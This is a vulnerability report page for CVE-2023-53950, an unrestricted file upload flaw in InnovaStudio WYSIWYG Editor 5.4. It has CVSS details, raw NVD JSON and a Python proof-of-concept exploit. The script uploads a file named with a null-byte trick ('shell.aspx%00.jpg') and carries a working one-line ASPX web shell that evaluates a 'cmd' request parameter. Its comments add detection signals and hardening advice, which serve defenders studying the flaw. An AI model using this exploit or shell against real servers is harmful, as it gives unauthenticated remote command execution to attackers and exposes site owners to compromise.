Security Vulnerability Report
CVE-2023-53950 CVSS 9.8 CRITICAL

CVE-2023-53950

Published: 2025-12-19 21:15:51
Last Modified: 2026-04-15 00:35:42

Description

InnovaStudio WYSIWYG Editor 5.4 contains an unrestricted file upload vulnerability that allows attackers to bypass file extension restrictions through filename manipulation. Attackers can upload malicious ASP shells by using null byte techniques and alternate file extensions to circumvent upload controls in the asset manager.

CVSS Details

CVSS Score (v3.1)
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

InnovaStudio WYSIWYG Editor 5.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
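#!/usr/bin/env python3
# CVE-2023-53950 PoC - InnovaStudio WYSIWYG Editor Unrestricted File Upload
# Target: InnovaStudio WYSIWYG Editor 5.4 Asset Manager
#
# What this listing puts on the wire (useful for log review and WAF rules):
#   * GET  <base>/assetmanager/assetmanager.aspx
#   * POST <base>/assetmanager/assetmanager.aspx as multipart/form-data, with
#     a part named "file" (filename "shell.aspx%00.jpg", declared type
#     image/jpeg) and a form field folder=/uploads/
#   Neither request carries cookies or credentials, which matches PR:N in the
#   CVSS vector.
#
# Detection signals that follow from the above:
#   * upload filenames containing "%00", a NUL byte, or a script extension
#     ahead of the final extension
#   * script-type files appearing under upload directories
#   * requests to such files that carry a "cmd" parameter (the payload at the
#     bottom evaluates Request.Item["cmd"])
#
# Hardening: choose the stored filename server-side, check the decoded name
# against an extension allow-list and reject control characters, keep upload
# directories out of reach of script handlers, and put the asset manager
# behind authentication or remove it where it is unused.
#
# NOTE(review): the script never confirms that a file was stored or is
# served; an HTTP 200 is the only signal it uses, so its output is not
# evidence that a host is or is not affected.
# NOTE(review): the endpoint name and the .aspx naming are taken as-is from
# this listing; the advisory text speaks of ASP shells and does not name the
# endpoint, so signatures should not key on this exact path or extension.
import requests
import sys


def upload_webshell(target_url, webshell_content):
    """Send one multipart upload to the asset manager and report the result.

    Args:
        target_url: Base URL of the editor install (the caller strips any
            trailing slash).
        webshell_content: Body of the uploaded file part.

    Returns:
        True when the POST answers with HTTP 200; False for any other status
        or when requests raises RequestException. True does not mean a file
        was stored: the assumed path is printed but never fetched.
    """
    # Asset manager upload endpoint as assumed by this listing.
    upload_url = f"{target_url}/assetmanager/assetmanager.aspx"

    # The filename places the text "%00" between a script extension and an
    # image extension; the advisory names this kind of filename manipulation
    # as the way the extension restriction is bypassed.
    files = {
        'file': ('shell.aspx%00.jpg', webshell_content, 'image/jpeg')
    }
    data = {
        'folder': '/uploads/'
    }

    try:
        print(f"[*] Attempting to upload webshell to {target_url}")
        print("[*] Using null byte injection technique...")
        response = requests.post(upload_url, files=files, data=data, timeout=30)

        if response.status_code == 200:
            print("[+] File upload request sent successfully")
            # Assumed location only; nothing below checks that it exists.
            webshell_path = f"{target_url}/uploads/shell.aspx"
            print(f"[+] Webshell should be available at: {webshell_path}")
            return True

        print(f"[-] Upload failed with status: {response.status_code}")
        return False
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return False


def check_vulnerability(target_url):
    """Report whether the asset manager URL answers a GET with HTTP 200.

    This is a reachability check, not a vulnerability check: no version or
    behaviour of the editor is inspected.

    Args:
        target_url: Base URL of the editor install.

    Returns:
        True on HTTP 200; False on any other status or on a requests error.
    """
    test_url = f"{target_url}/assetmanager/assetmanager.aspx"

    try:
        response = requests.get(test_url, timeout=10)
    except requests.exceptions.RequestException:
        # Narrowed from a bare ``except:`` so that Ctrl-C and programming
        # errors are no longer silently swallowed; network failures still
        # count as "not reachable".
        return False

    if response.status_code == 200:
        print("[+] Target appears to be running InnovaStudio Asset Manager")
        return True
    return False


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2023-53950-poc.py <target_url>")
        print("Example: python cve-2023-53950-poc.py http://target.com/editor")
        sys.exit(1)

    target = sys.argv[1].rstrip('/')

    # Payload as given in the listing: a server-side page that evaluates the
    # "cmd" request item. Requests carrying that parameter to a file under an
    # upload directory are a post-compromise indicator.
    webshell = '''<%@ Page Language="Jscript"%><%eval(Request.Item["cmd"],"unsafe");%>'''

    if check_vulnerability(target):
        upload_webshell(target, webshell)
    else:
        print("[-] Target does not appear to be vulnerable or is not reachable")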

References

Raw JSON Data

{"cve": {"id": "CVE-2023-53950", "sourceIdentifier": "[email protected]", "published": "2025-12-19T21:15:51.080", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "InnovaStudio WYSIWYG Editor 5.4 contains an unrestricted file upload vulnerability that allows attackers to bypass file extension restrictions through filename manipulation. Attackers can upload malicious ASP shells by using null byte techniques and alternate file extensions to circumvent upload controls in the asset manager."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": 
"NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "references": [{"url": "https://innovastudio.com", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/51362", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/innovastudio-wysiwyg-editor-unrestricted-file-upload-via-filename-manipulation", "source": "[email protected]"}]}}